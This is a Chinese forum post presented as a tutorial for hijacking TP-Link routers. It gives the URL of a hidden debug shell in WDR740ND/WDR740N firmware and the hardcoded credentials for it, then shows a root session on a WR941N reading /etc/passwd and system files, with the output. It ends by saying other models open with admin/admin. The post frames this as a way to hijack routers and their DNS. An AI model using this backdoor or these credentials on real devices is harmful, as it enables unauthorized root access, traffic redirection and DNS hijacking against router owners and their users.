TP-Link WDR740ND的路由shell-路由劫持教程

admin

这个牛逼，分享如何劫持，如何用路由劫持DNS等各种DIY。

嘿嘿。很给力的。

TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell，可以root权限，可能会被攻击者滥用。

固件版本：3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是：TP-Link TL-WR941N
软件版本：3.11.7 Build 100723 Rel.46142n
硬件版本：WR941N v4/v5 00000000

1. cat /proc/cpuinfo&
   
2. 827
   
3. # system type                : Atheros AR7240 (Python)
   
4. processor                : 0
   
5. cpu model                : MIPS 24K V7.4
   
6. BogoMIPS                : 265.21
   
7. wait instruction        : yes
   
8. microsecond timers        : yes
   
9. tlb_entries                : 16
   
10. extra interrupt vector        : yes
    
11. hardware watchpoint        : yes
    
12. ASEs implemented        : mips16
    
13. VCED exceptions                : not available
    
14. VCEI exceptions                : not available
    
15. 
    
16. cat /etc/passwd&
    
17. 828
    
18. # root:x:0:0:root:/root:/bin/sh
    
19. Admin:x:0:0:root:/root:/bin/sh
    
20. bin:x:1:1:bin:/bin:/bin/sh
    
21. daemon:x:2:2:daemon:/usr/sbin:/bin/sh
    
22. adm:x:3:4:adm:/adm:/bin/sh
    
23. lp:x:4:7:lp:/var/spool/lpd:/bin/sh
    
24. sync:x:5:0:sync:/bin:/bin/sync
    
25. shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
    
26. halt:x:7:0:halt:/sbin:/sbin/halt
    
27. uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
    
28. operator:x:11:0:Operator:/var:/bin/sh
    
29. nobody:x:65534:65534:nobody:/home:/bin/sh
    
30. ap71:x:500:0:Linux User,,,:/root:/bin/sh
    
31. 
    
32. cat /proc/meminfo&
    
33. 843
    
34. # MemTotal:        30676 kB
    
35. MemFree:         12876 kB
    
36. Buffers:          1836 kB
    
37. Cached:           6056 kB
    
38. SwapCached:          0 kB
    
39. Active:           6116 kB
    
40. Inactive:         3892 kB
    
41. HighTotal:           0 kB
    
42. HighFree:            0 kB
    
43. LowTotal:        30676 kB
    
44. LowFree:         12876 kB
    
45. SwapTotal:           0 kB
    
46. SwapFree:            0 kB
    
47. Dirty:               0 kB
    
48. Writeback:           0 kB
    
49. Mapped:           4276 kB
    
50. Slab:             5436 kB
    
51. CommitLimit:     15336 kB
    
52. Committed_AS:     4324 kB
    
53. PageTables:        276 kB
    
54. VmallocTotal:  1048560 kB
    
55. VmallocUsed:      1944 kB
    
56. VmallocChunk:  1046464 kB
    
57. 
    
58. # ls /
    
59. bin      etc      linuxrc  proc     sbin     usr      web
    
60. dev      lib      mnt      root     tmp      var
    
61. #

复制代码

2041N 我也进去了 账户是 admin admin 841n刚才试了下也可以 具体怎么操作可以继续研究研究。